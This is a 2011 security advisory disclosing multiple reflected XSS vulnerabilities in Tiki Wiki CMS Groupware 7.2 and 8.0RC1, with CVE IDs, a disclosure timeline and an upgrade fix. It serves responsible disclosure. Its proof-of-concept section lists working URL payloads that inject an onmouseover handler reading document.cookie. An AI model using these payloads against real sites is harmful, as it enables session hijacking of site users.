Tiki Wiki CMS Groupware Multiple XSS vulnerabilities

2011-11-21T00:00:00
ID SECURITYVULNS:DOC:27323
Type securityvulns
Reporter Securityvulns
Modified 2011-11-21T00:00:00

Description

Advisory: Tiki Wiki CMS Groupware Multiple XSS vulnerabilities Advisory ID: INFOSERVE-ADV2011-01 Author: Stefan Schurtz Contact: security@infoserve.de Affected Software: Successfully tested on Tiki 7.2 & 8.0 RC1 Vendor URL: http://info.tiki.org/ Vendor Status: fixed for Tiki 7 (New Tiki 6 LTS release in progress) CVE-ID: CVE-2011-4454, CVE-2011-4455

========================== Vulnerability Description ==========================

All versions of Tiki 6 and Tiki 7 and version Tiki 8.0RC1 are prone to multiple XSS vulnerabilities

================== PoC-Exploit ==================

8.0RC1

http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-8.0.RC1/tiki-index.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)"

7.2

http://<target>/tiki-7.2/tiki-admin_system.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-7.2/tiki-pagehistory.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-7.2/tiki-removepage.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-7.2/tiki-rename_page.php/" onmouseover="alert(document.cookie)"

========= Solution =========

Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x)

==================== Disclosure Timeline ====================

02-Nov-2011 - informed Security Team (security@tikiwiki.org) 03-Nov-2011 - feedback from vendor 11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x)

======== Credits ========

Vulnerabilities found and advisory written by the INFOSERVE Security Team

=========== References ===========

http://info.tiki.org/ http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1 http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x http://secunia.com/advisories/46740